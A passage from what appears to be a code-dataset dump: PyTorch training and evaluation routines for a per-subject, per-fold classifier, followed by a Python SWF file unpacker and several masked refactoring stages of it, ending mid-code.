get_metrics(y_pred=pred_val, y_true=act_val)\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.format(\n epoch, loss_val, acc_val, f1_val))\n if acc_val > trlog['max_acc']:\n trlog['max_acc'] = acc_val\n save_model('max-acc')\n if args.save_model:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(\n fold) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.\n data_format, args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce\n )\n torch.save(model.state_dict(), model_name_reproduce)\n trlog['train_loss'].append(loss_train)\n trlog['train_acc'].append(acc_train)\n trlog['val_loss'].append(loss_val)\n trlog['val_acc'].append(acc_val)\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.\n measure(epoch / args.max_epoch), subject, fold))\n save_name_ = 'trlog' + save_name\n ensure_path(osp.join(args.save_path, 'log_train'))\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\n return trlog['max_acc']\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-5": "\r\nfrom utils import *\r\nimport copy\r\nimport torch.nn as nn\r\n\r\nCUDA = torch.cuda.is_available()\r\n\r\n\r\ndef train_one_epoch(data_loader, net, loss_fn, optimizer):\r\n net.train()\r\n tl = Averager()\r\n pred_train = []\r\n act_train = []\r\n for i, (x_batch, y_batch) in enumerate(data_loader):\r\n if CUDA:\r\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\r\n\r\n out = net(x_batch)\r\n loss = loss_fn(out, y_batch)\r\n _, pred = torch.max(out, 1)\r\n tl.add(loss)\r\n pred_train.extend(pred.data.tolist())\r\n act_train.extend(y_batch.data.tolist())\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n return tl.item(), pred_train, act_train\r\n\r\n\r\ndef predict(data_loader, net, loss_fn):\r\n net.eval()\r\n pred_val = []\r\n act_val = []\r\n vl = Averager()\r\n with torch.no_grad():\r\n for i, (x_batch, y_batch) in enumerate(data_loader):\r\n if CUDA:\r\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\r\n\r\n out = net(x_batch)\r\n loss = loss_fn(out, y_batch)\r\n _, pred = torch.max(out, 1)\r\n vl.add(loss.item())\r\n pred_val.extend(pred.data.tolist())\r\n act_val.extend(y_batch.data.tolist())\r\n return vl.item(), pred_val, act_val\r\n\r\n\r\ndef set_up(args):\r\n set_gpu(args.gpu)\r\n ensure_path(args.save_path)\r\n torch.manual_seed(args.random_seed)\r\n torch.backends.cudnn.deterministic = True\r\n\r\n\r\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\r\n seed_all(args.random_seed)\r\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\r\n set_up(args)\r\n\r\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\r\n\r\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\r\n\r\n model = get_model(args)\r\n para = get_trainable_parameter_num(model)\r\n print('Model {} size:{}'.format(args.model, para))\r\n\r\n if CUDA:\r\n model = model.cuda()\r\n\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n def save_model(name):\r\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\r\n if os.path.exists(previous_model):\r\n os.remove(previous_model)\r\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))\r\n\r\n trlog = {}\r\n trlog['args'] = vars(args)\r\n trlog['train_loss'] = []\r\n trlog['val_loss'] = []\r\n trlog['train_acc'] = []\r\n trlog['val_acc'] = []\r\n trlog['max_acc'] = 0.0\r\n\r\n timer = Timer()\r\n\r\n for epoch in range(1, args.max_epoch + 1):\r\n\r\n loss_train, pred_train, act_train = train_one_epoch(\r\n data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\r\n\r\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)\r\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'\r\n .format(epoch, loss_train, acc_train, f1_train))\r\n\r\n loss_val, pred_val, act_val = predict(\r\n data_loader=val_loader, net=model, loss_fn=loss_fn\r\n )\r\n acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)\r\n print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.\r\n format(epoch, loss_val, acc_val, f1_val))\r\n\r\n\r\n if acc_val > trlog['max_acc']:\r\n trlog['max_acc'] = acc_val\r\n save_model('max-acc')\r\n\r\n if args.save_model:\r\n # save model here for reproduce\r\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'\r\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)\r\n save_path = osp.join(args.save_path, data_type)\r\n ensure_path(save_path)\r\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\r\n torch.save(model.state_dict(), model_name_reproduce)\r\n\r\n trlog['train_loss'].append(loss_train)\r\n trlog['train_acc'].append(acc_train)\r\n trlog['val_loss'].append(loss_val)\r\n trlog['val_acc'].append(acc_val)\r\n\r\n print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),\r\n subject, fold))\r\n save_name_ = 'trlog' + save_name\r\n ensure_path(osp.join(args.save_path, 'log_train'))\r\n torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))\r\n\r\n return trlog['max_acc']\r\n\r\n\r\ndef test(args, data, label, reproduce, subject, fold):\r\n seed_all(args.random_seed)\r\n set_up(args)\r\n\r\n test_loader = get_dataloader(data, label, args.batch_size, False)\r\n\r\n model = get_model(args)\r\n if CUDA:\r\n model = model.cuda()\r\n loss_fn = nn.CrossEntropyLoss()\r\n\r\n if reproduce:\r\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'\r\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)\r\n save_path = osp.join(args.save_path, data_type)\r\n ensure_path(save_path)\r\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\r\n model.load_state_dict(torch.load(model_name_reproduce))\r\n else:\r\n model.load_state_dict(torch.load(args.load_path))\r\n loss, pred, act = predict(\r\n data_loader=test_loader, net=model, loss_fn=loss_fn\r\n )\r\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\r\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\r\n return acc, pred, act\r\n\r\n\r\n",
"step-ids": [
2,
4,
6,
7,
8
]
}
|
[
2,
4,
6,
7,
8
] |
#!/usr/bin/env python3
import sys
import os
import math
import tempfile
import zlib
import lzma
import struct
import bitstruct
# a swf file unpacker and analyzer
# majority of information taken from https://www.adobe.com/devnet/swf.html (version 19)
# some additional information taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart
class SWFFileUnpackingException(Exception):
'''generic exception during unpacking of a swf file typically due to incorrect structure or unexpected values'''
class SWFRect(object):
def __init__(self, xmin, xmax, ymin, ymax):
self.xmin = xmin
self.xmax = xmax
self.ymin = ymin
self.ymax = ymax
def __str__(self):
return 'SWFRect('+str(self.xmin)+','+str(self.xmax)+','+str(self.ymin)+','+str(self.ymax)+')'
tagCodeTranslation = {
0:'End',
1:'ShowFrame',
2:'DefineShape',
4:'PlaceObject',
5:'RemoveObject',
6:'DefineBits',
7:'DefineButton',
8:'JPEGTables',
9:'SetBackgroundColor',
10:'DefineFont',
11:'DefineText',
12:'DoAction',
13:'DefineFontInfo',
14:'DefineSound',
15:'StartSound',
17:'DefineButtonSound',
18:'SoundStreamHead',
19:'SoundStreamBlock',
20:'DefineBitsLossless',
21:'DefineBitsJPEG2',
22:'DefineShape2',
23:'DefineButtonCxform',
24:'Protect',
26:'PlaceObject2',
28:'RemoveObject2',
32:'DefineShape3',
33:'DefineText2',
34:'DefineButton2',
35:'DefineBitsJPEG3',
36:'DefineBitsLossless2',
37:'DefineEditText',
39:'DefineSprite',
41:'ProductInfo', # taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart
43:'FrameLabel',
45:'SoundStreamHead2',
46:'DefineMorphShape',
48:'DefineFont2',
56:'ExportAssets',
57:'ImportAssets',
58:'EnableDebugger',
59:'DoInitAction',
60:'DefineVideoStream',
61:'VideoFrame',
62:'DefineFontInfo2',
63:'DebugID', # taken from https://github.com/claus/as3swf/wiki/SWF-tag-support-chart
64:'EnableDebugger2',
65:'ScriptLimits',
66:'SetTabIndex',
69:'FileAttributes',
70:'PlaceObject3',
71:'ImportAssets2',
73:'DefineFontAlignZones',
74:'CSMTextSettings',
75:'DefineFont3',
76:'SymbolClass',
77:'Metadata',
78:'DefineScalingGrid',
82:'DoABC',
83:'DefineShape4',
84:'DefineMorphShape2',
86:'DefineSceneAndFrameLabelData',
87:'DefineBinaryData',
88:'DefineFontName',
89:'StartSound2',
90:'DefineBitsJPEG4',
91:'DefineFont4',
93:'EnableTelemetry',
}
class SWFTag(object):
def __init__(self, code, length):
self.code = code
self.length = length
self.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')
if self.typeName == '!UNKNOWN!':
print('warning: unknown swf tag code: '+str(self.code))
def isEndTag(self):
return self.typeName == 'End'
def __str__(self):
return 'SWFTag(code='+str(self.code)+' "'+self.typeName+'", length='+str(self.length)+')'
class SWFFile(object):
def __init__(self, filepath):
self.filepath = filepath
self.compression = None
self.version = None
self.fileLength = None
self.frameSize = None
self.frameRate = None
self.frameCount = None
self.tags = []
self.chunkSize = 16 * 4096
self.load()
def load(self):
'''loads the swf file at the filepath'''
self.handle = open(self.filepath, 'rb')
self.unpackHeader1()
print('signature:', self.signature)
print('version:', self.version)
print('fileLength:', self.fileLength)
if self.compression != 'none':
self.decompress()
self.unpackHeader2()
print('frameSize:', self.frameSize)
print('frameRate:', self.frameRate)
print('frameCount:', self.frameCount)
self.unpackTags()
for tag in self.tags:
print(tag)
if tag.typeName == '!UNKNOWN!':
print('warning: unknown tag!')
def decompress(self):
'''replaces the handle with a tempfile handle with all content decompressed'''
temp = tempfile.TemporaryFile('w+b')
if self.compression == 'zlib':
decompressor = zlib.decompressobj()
elif self.compression == 'lzma':
decompressor = lzma.LZMADecompressor()
else:
raise Exception("unknown compression algorithm: "+self.compression)
chunk = self.handle.read(self.chunkSize)
while len(chunk) > 0:
temp.write(decompressor.decompress(chunk))
chunk = self.handle.read(self.chunkSize)
temp.seek(0)
self.handle = temp
def unpackHeader1(self):
'''unpacks the first 8 bytes of the header and figures out what compression there is'''
header = self.handle.read(8)
signature, self.version, self.fileLength = struct.unpack('<3sBI', header)
signature = signature.decode('ascii')
if signature == 'FWS':
self.compression = 'none'
elif signature == 'CWS':
self.compression = 'zlib'
elif signature == 'ZWS':
self.compression = 'lzma'
else:
raise SWFFileUnpackingException('unknown file signature: "'+signature+'"')
self.signature = signature
def unpackHeader2(self):
'''unpacks the rest of the header data that might have been compressed'''
self.frameSize = self.unpackRect()
self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.read(4))
# frameRate is an 8.8 float actually, but i'm not sure how to unpack that...
def unpackRect(self):
data = self.handle.read(1)
size, = bitstruct.unpack('u5', data)
data += self.handle.read(math.ceil((size * 4 - 3) / 8))
xmin, xmax, ymin, ymax = bitstruct.unpack('p5'+('s'+str(size))*4, data)
return SWFRect(xmin, xmax, ymin, ymax)
def unpackTags(self):
sample = self.handle.read(2)
tag = None
while len(sample) > 0:
if tag is not None and tag.isEndTag():
print('warning: swf has tags after an end tag!')
self.handle.seek(-2, os.SEEK_CUR)
tag = self.unpackTag()
self.tags.append(tag)
sample = self.handle.read(2)
def unpackTag(self):
tag = self.unpackTagHeader()
self.handle.read(tag.length)
return tag
def unpackTagHeader(self):
data, = struct.unpack('<H', self.handle.read(2))
tagCode = data >> 6
tagLength = data & 0x3f
if tagLength == 0x3f:
tagLength, = struct.unpack('<I', self.handle.read(4))
return SWFTag(tagCode, tagLength)
def main():
if len(sys.argv) < 2:
print('filepath required')
else:
file = SWFFile(sys.argv[1])
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "4556febd5fddf390f370a8e24871eacf08d34c9f",
"index": 7087,
"step-1": "<mask token>\n\n\nclass SWFRect(object):\n\n def __init__(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n\n def __str__(self):\n return 'SWFRect(' + str(self.xmin) + ',' + str(self.xmax) + ',' + str(\n self.ymin) + ',' + str(self.ymax) + ')'\n\n\n<mask token>\n\n\nclass SWFTag(object):\n\n def __init__(self, code, length):\n self.code = code\n self.length = length\n self.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n if self.typeName == '!UNKNOWN!':\n print('warning: unknown swf tag code: ' + str(self.code))\n\n def isEndTag(self):\n return self.typeName == 'End'\n\n def __str__(self):\n return 'SWFTag(code=' + str(self.code\n ) + ' \"' + self.typeName + '\", length=' + str(self.length) + ')'\n\n\nclass SWFFile(object):\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.compression = None\n self.version = None\n self.fileLength = None\n self.frameSize = None\n self.frameRate = None\n self.frameCount = None\n self.tags = []\n self.chunkSize = 16 * 4096\n self.load()\n\n def load(self):\n \"\"\"loads the swf file at the filepath\"\"\"\n self.handle = open(self.filepath, 'rb')\n self.unpackHeader1()\n print('signature:', self.signature)\n print('version:', self.version)\n print('fileLength:', self.fileLength)\n if self.compression != 'none':\n self.decompress()\n self.unpackHeader2()\n print('frameSize:', self.frameSize)\n print('frameRate:', self.frameRate)\n print('frameCount:', self.frameCount)\n self.unpackTags()\n for tag in self.tags:\n print(tag)\n if tag.typeName == '!UNKNOWN!':\n print('warning: unknown tag!')\n\n def decompress(self):\n \"\"\"replaces the handle with a tempfile handle with all content decompressed\"\"\"\n temp = tempfile.TemporaryFile('w+b')\n if self.compression == 'zlib':\n decompressor = zlib.decompressobj()\n elif self.compression == 'lzma':\n decompressor = lzma.LZMADecompressor()\n else:\n raise Exception('unknown compression algorithm: ' + self.\n compression)\n chunk = self.handle.read(self.chunkSize)\n while len(chunk) > 0:\n temp.write(decompressor.decompress(chunk))\n chunk = self.handle.read(self.chunkSize)\n temp.seek(0)\n self.handle = temp\n\n def unpackHeader1(self):\n \"\"\"unpacks the first 8 bytes of the header and figures out what compression there is\"\"\"\n header = self.handle.read(8)\n signature, self.version, self.fileLength = struct.unpack('<3sBI',\n header)\n signature = signature.decode('ascii')\n if signature == 'FWS':\n self.compression = 'none'\n elif signature == 'CWS':\n self.compression = 'zlib'\n elif signature == 'ZWS':\n self.compression = 'lzma'\n else:\n raise SWFFileUnpackingException('unknown file signature: \"' +\n signature + '\"')\n self.signature = signature\n\n def unpackHeader2(self):\n \"\"\"unpacks the rest of the header data that might have been compressed\"\"\"\n self.frameSize = self.unpackRect()\n self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.\n read(4))\n\n def unpackRect(self):\n data = self.handle.read(1)\n size, = bitstruct.unpack('u5', data)\n data += self.handle.read(math.ceil((size * 4 - 3) / 8))\n xmin, xmax, ymin, ymax = bitstruct.unpack('p5' + ('s' + str(size)) *\n 4, data)\n return SWFRect(xmin, xmax, ymin, ymax)\n\n def unpackTags(self):\n sample = self.handle.read(2)\n tag = None\n while len(sample) > 0:\n if tag is not None and tag.isEndTag():\n print('warning: swf has tags after an end tag!')\n self.handle.seek(-2, os.SEEK_CUR)\n tag = self.unpackTag()\n self.tags.append(tag)\n sample = self.handle.read(2)\n\n def unpackTag(self):\n tag = self.unpackTagHeader()\n self.handle.read(tag.length)\n return tag\n\n def unpackTagHeader(self):\n data, = struct.unpack('<H', self.handle.read(2))\n tagCode = data >> 6\n tagLength = data & 63\n if tagLength == 63:\n tagLength, = struct.unpack('<I', self.handle.read(4))\n return SWFTag(tagCode, tagLength)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SWFFileUnpackingException(Exception):\n <mask token>\n\n\nclass SWFRect(object):\n\n def __init__(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n\n def __str__(self):\n return 'SWFRect(' + str(self.xmin) + ',' + str(self.xmax) + ',' + str(\n self.ymin) + ',' + str(self.ymax) + ')'\n\n\n<mask token>\n\n\nclass SWFTag(object):\n\n def __init__(self, code, length):\n self.code = code\n self.length = length\n self.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n if self.typeName == '!UNKNOWN!':\n print('warning: unknown swf tag code: ' + str(self.code))\n\n def isEndTag(self):\n return self.typeName == 'End'\n\n def __str__(self):\n return 'SWFTag(code=' + str(self.code\n ) + ' \"' + self.typeName + '\", length=' + str(self.length) + ')'\n\n\nclass SWFFile(object):\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.compression = None\n self.version = None\n self.fileLength = None\n self.frameSize = None\n self.frameRate = None\n self.frameCount = None\n self.tags = []\n self.chunkSize = 16 * 4096\n self.load()\n\n def load(self):\n \"\"\"loads the swf file at the filepath\"\"\"\n self.handle = open(self.filepath, 'rb')\n self.unpackHeader1()\n print('signature:', self.signature)\n print('version:', self.version)\n print('fileLength:', self.fileLength)\n if self.compression != 'none':\n self.decompress()\n self.unpackHeader2()\n print('frameSize:', self.frameSize)\n print('frameRate:', self.frameRate)\n print('frameCount:', self.frameCount)\n self.unpackTags()\n for tag in self.tags:\n print(tag)\n if tag.typeName == '!UNKNOWN!':\n print('warning: unknown tag!')\n\n def decompress(self):\n \"\"\"replaces the handle with a tempfile handle with all content decompressed\"\"\"\n temp = tempfile.TemporaryFile('w+b')\n if self.compression == 'zlib':\n decompressor = zlib.decompressobj()\n elif self.compression == 'lzma':\n decompressor = lzma.LZMADecompressor()\n else:\n raise Exception('unknown compression algorithm: ' + self.\n compression)\n chunk = self.handle.read(self.chunkSize)\n while len(chunk) > 0:\n temp.write(decompressor.decompress(chunk))\n chunk = self.handle.read(self.chunkSize)\n temp.seek(0)\n self.handle = temp\n\n def unpackHeader1(self):\n \"\"\"unpacks the first 8 bytes of the header and figures out what compression there is\"\"\"\n header = self.handle.read(8)\n signature, self.version, self.fileLength = struct.unpack('<3sBI',\n header)\n signature = signature.decode('ascii')\n if signature == 'FWS':\n self.compression = 'none'\n elif signature == 'CWS':\n self.compression = 'zlib'\n elif signature == 'ZWS':\n self.compression = 'lzma'\n else:\n raise SWFFileUnpackingException('unknown file signature: \"' +\n signature + '\"')\n self.signature = signature\n\n def unpackHeader2(self):\n \"\"\"unpacks the rest of the header data that might have been compressed\"\"\"\n self.frameSize = self.unpackRect()\n self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.\n read(4))\n\n def unpackRect(self):\n data = self.handle.read(1)\n size, = bitstruct.unpack('u5', data)\n data += self.handle.read(math.ceil((size * 4 - 3) / 8))\n xmin, xmax, ymin, ymax = bitstruct.unpack('p5' + ('s' + str(size)) *\n 4, data)\n return SWFRect(xmin, xmax, ymin, ymax)\n\n def unpackTags(self):\n sample = self.handle.read(2)\n tag = None\n while len(sample) > 0:\n if tag is not None and tag.isEndTag():\n print('warning: swf has tags after an end tag!')\n self.handle.seek(-2, os.SEEK_CUR)\n tag = self.unpackTag()\n self.tags.append(tag)\n sample = self.handle.read(2)\n\n def unpackTag(self):\n tag = self.unpackTagHeader()\n self.handle.read(tag.length)\n return tag\n\n def unpackTagHeader(self):\n data, = struct.unpack('<H', self.handle.read(2))\n tagCode = data >> 6\n tagLength = data & 63\n if tagLength == 63:\n tagLength, = struct.unpack('<I', self.handle.read(4))\n return SWFTag(tagCode, tagLength)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SWFFileUnpackingException(Exception):\n \"\"\"generic exception during unpacking of a swf file typically due to incorrect structure or unexpected values\"\"\"\n\n\nclass SWFRect(object):\n\n def __init__(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n\n def __str__(self):\n return 'SWFRect(' + str(self.xmin) + ',' + str(self.xmax) + ',' + str(\n self.ymin) + ',' + str(self.ymax) + ')'\n\n\n<mask token>\n\n\nclass SWFTag(object):\n\n def __init__(self, code, length):\n self.code = code\n self.length = length\n self.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n if self.typeName == '!UNKNOWN!':\n print('warning: unknown swf tag code: ' + str(self.code))\n\n def isEndTag(self):\n return self.typeName == 'End'\n\n def __str__(self):\n return 'SWFTag(code=' + str(self.code\n ) + ' \"' + self.typeName + '\", length=' + str(self.length) + ')'\n\n\nclass SWFFile(object):\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.compression = None\n self.version = None\n self.fileLength = None\n self.frameSize = None\n self.frameRate = None\n self.frameCount = None\n self.tags = []\n self.chunkSize = 16 * 4096\n self.load()\n\n def load(self):\n \"\"\"loads the swf file at the filepath\"\"\"\n self.handle = open(self.filepath, 'rb')\n self.unpackHeader1()\n print('signature:', self.signature)\n print('version:', self.version)\n print('fileLength:', self.fileLength)\n if self.compression != 'none':\n self.decompress()\n self.unpackHeader2()\n print('frameSize:', self.frameSize)\n print('frameRate:', self.frameRate)\n print('frameCount:', self.frameCount)\n self.unpackTags()\n for tag in self.tags:\n print(tag)\n if tag.typeName == '!UNKNOWN!':\n print('warning: unknown tag!')\n\n def decompress(self):\n \"\"\"replaces the handle with a tempfile handle with all content decompressed\"\"\"\n temp = tempfile.TemporaryFile('w+b')\n if self.compression == 'zlib':\n decompressor = zlib.decompressobj()\n elif self.compression == 'lzma':\n decompressor = lzma.LZMADecompressor()\n else:\n raise Exception('unknown compression algorithm: ' + self.\n compression)\n chunk = self.handle.read(self.chunkSize)\n while len(chunk) > 0:\n temp.write(decompressor.decompress(chunk))\n chunk = self.handle.read(self.chunkSize)\n temp.seek(0)\n self.handle = temp\n\n def unpackHeader1(self):\n \"\"\"unpacks the first 8 bytes of the header and figures out what compression there is\"\"\"\n header = self.handle.read(8)\n signature, self.version, self.fileLength = struct.unpack('<3sBI',\n header)\n signature = signature.decode('ascii')\n if signature == 'FWS':\n self.compression = 'none'\n elif signature == 'CWS':\n self.compression = 'zlib'\n elif signature == 'ZWS':\n self.compression = 'lzma'\n else:\n raise SWFFileUnpackingException('unknown file signature: \"' +\n signature + '\"')\n self.signature = signature\n\n def unpackHeader2(self):\n \"\"\"unpacks the rest of the header data that might have been compressed\"\"\"\n self.frameSize = self.unpackRect()\n self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.\n read(4))\n\n def unpackRect(self):\n data = self.handle.read(1)\n size, = bitstruct.unpack('u5', data)\n data += self.handle.read(math.ceil((size * 4 - 3) / 8))\n xmin, xmax, ymin, ymax = bitstruct.unpack('p5' + ('s' + str(size)) *\n 4, data)\n return SWFRect(xmin, xmax, ymin, ymax)\n\n def unpackTags(self):\n sample = self.handle.read(2)\n tag = None\n while len(sample) > 0:\n if tag is not None and tag.isEndTag():\n print('warning: swf has tags after an end tag!')\n self.handle.seek(-2, os.SEEK_CUR)\n tag = self.unpackTag()\n self.tags.append(tag)\n sample = self.handle.read(2)\n\n def unpackTag(self):\n tag = self.unpackTagHeader()\n self.handle.read(tag.length)\n return tag\n\n def unpackTagHeader(self):\n data, = struct.unpack('<H', self.handle.read(2))\n tagCode = data >> 6\n tagLength = data & 63\n if tagLength == 63:\n tagLength, = struct.unpack('<I', self.handle.read(4))\n return SWFTag(tagCode, tagLength)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('filepath required')\n else:\n file = SWFFile(sys.argv[1])\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass SWFFileUnpackingException(Exception):\n \"\"\"generic exception during unpacking of a swf file typically due to incorrect structure or unexpected values\"\"\"\n\n\nclass SWFRect(object):\n\n def __init__(self, xmin, xmax, ymin, ymax):\n self.xmin = xmin\n self.xmax = xmax\n self.ymin = ymin\n self.ymax = ymax\n\n def __str__(self):\n return 'SWFRect(' + str(self.xmin) + ',' + str(self.xmax) + ',' + str(\n self.ymin) + ',' + str(self.ymax) + ')'\n\n\ntagCodeTranslation = {(0): 'End', (1): 'ShowFrame', (2): 'DefineShape', (4):\n 'PlaceObject', (5): 'RemoveObject', (6): 'DefineBits', (7):\n 'DefineButton', (8): 'JPEGTables', (9): 'SetBackgroundColor', (10):\n 'DefineFont', (11): 'DefineText', (12): 'DoAction', (13):\n 'DefineFontInfo', (14): 'DefineSound', (15): 'StartSound', (17):\n 'DefineButtonSound', (18): 'SoundStreamHead', (19): 'SoundStreamBlock',\n (20): 'DefineBitsLossless', (21): 'DefineBitsJPEG2', (22):\n 'DefineShape2', (23): 'DefineButtonCxform', (24): 'Protect', (26):\n 'PlaceObject2', (28): 'RemoveObject2', (32): 'DefineShape3', (33):\n 'DefineText2', (34): 'DefineButton2', (35): 'DefineBitsJPEG3', (36):\n 'DefineBitsLossless2', (37): 'DefineEditText', (39): 'DefineSprite', (\n 41): 'ProductInfo', (43): 'FrameLabel', (45): 'SoundStreamHead2', (46):\n 'DefineMorphShape', (48): 'DefineFont2', (56): 'ExportAssets', (57):\n 'ImportAssets', (58): 'EnableDebugger', (59): 'DoInitAction', (60):\n 'DefineVideoStream', (61): 'VideoFrame', (62): 'DefineFontInfo2', (63):\n 'DebugID', (64): 'EnableDebugger2', (65): 'ScriptLimits', (66):\n 'SetTabIndex', (69): 'FileAttributes', (70): 'PlaceObject3', (71):\n 'ImportAssets2', (73): 'DefineFontAlignZones', (74): 'CSMTextSettings',\n (75): 'DefineFont3', (76): 'SymbolClass', (77): 'Metadata', (78):\n 'DefineScalingGrid', (82): 'DoABC', (83): 'DefineShape4', (84):\n 'DefineMorphShape2', (86): 'DefineSceneAndFrameLabelData', (87):\n 'DefineBinaryData', (88): 'DefineFontName', (89): 'StartSound2', (90):\n 'DefineBitsJPEG4', (91): 'DefineFont4', (93): 'EnableTelemetry'}\n\n\nclass SWFTag(object):\n\n def __init__(self, code, length):\n self.code = code\n self.length = length\n self.typeName = tagCodeTranslation.get(self.code, '!UNKNOWN!')\n if self.typeName == '!UNKNOWN!':\n print('warning: unknown swf tag code: ' + str(self.code))\n\n def isEndTag(self):\n return self.typeName == 'End'\n\n def __str__(self):\n return 'SWFTag(code=' + str(self.code\n ) + ' \"' + self.typeName + '\", length=' + str(self.length) + ')'\n\n\nclass SWFFile(object):\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.compression = None\n self.version = None\n self.fileLength = None\n self.frameSize = None\n self.frameRate = None\n self.frameCount = None\n self.tags = []\n self.chunkSize = 16 * 4096\n self.load()\n\n def load(self):\n \"\"\"loads the swf file at the filepath\"\"\"\n self.handle = open(self.filepath, 'rb')\n self.unpackHeader1()\n print('signature:', self.signature)\n print('version:', self.version)\n print('fileLength:', self.fileLength)\n if self.compression != 'none':\n self.decompress()\n self.unpackHeader2()\n print('frameSize:', self.frameSize)\n print('frameRate:', self.frameRate)\n print('frameCount:', self.frameCount)\n self.unpackTags()\n for tag in self.tags:\n print(tag)\n if tag.typeName == '!UNKNOWN!':\n print('warning: unknown tag!')\n\n def decompress(self):\n \"\"\"replaces the handle with a tempfile handle with all content decompressed\"\"\"\n temp = tempfile.TemporaryFile('w+b')\n if self.compression == 'zlib':\n decompressor = zlib.decompressobj()\n elif self.compression == 'lzma':\n decompressor = lzma.LZMADecompressor()\n else:\n raise Exception('unknown compression algorithm: ' + self.\n compression)\n chunk = self.handle.read(self.chunkSize)\n while len(chunk) > 0:\n temp.write(decompressor.decompress(chunk))\n chunk = self.handle.read(self.chunkSize)\n temp.seek(0)\n self.handle = temp\n\n def unpackHeader1(self):\n \"\"\"unpacks the first 8 bytes of the header and figures out what compression there is\"\"\"\n header = self.handle.read(8)\n signature, self.version, self.fileLength = struct.unpack('<3sBI',\n header)\n signature = signature.decode('ascii')\n if signature == 'FWS':\n self.compression = 'none'\n elif signature == 'CWS':\n self.compression = 'zlib'\n elif signature == 'ZWS':\n self.compression = 'lzma'\n else:\n raise SWFFileUnpackingException('unknown file signature: \"' +\n signature + '\"')\n self.signature = signature\n\n def unpackHeader2(self):\n \"\"\"unpacks the rest of the header data that might have been compressed\"\"\"\n self.frameSize = self.unpackRect()\n self.frameRate, self.frameCount = struct.unpack('<HH', self.handle.\n read(4))\n\n def unpackRect(self):\n data = self.handle.read(1)\n size, = bitstruct.unpack('u5', data)\n data += self.handle.read(math.ceil((size * 4 - 3) / 8))\n xmin, xmax, ymin, ymax = bitstruct.unpack('p5' + ('s' + str(size)) *\n 4, data)\n return SWFRect(xmin, xmax, ymin, ymax)\n\n def unpackTags(self):\n sample = self.handle.read(2)\n tag = None\n while len(sample) > 0:\n if tag is not None and tag.isEndTag():\n print('warning: swf has tags after an end tag!')\n self.handle.seek(-2, os.SEEK_CUR)\n tag = self.unpackTag()\n 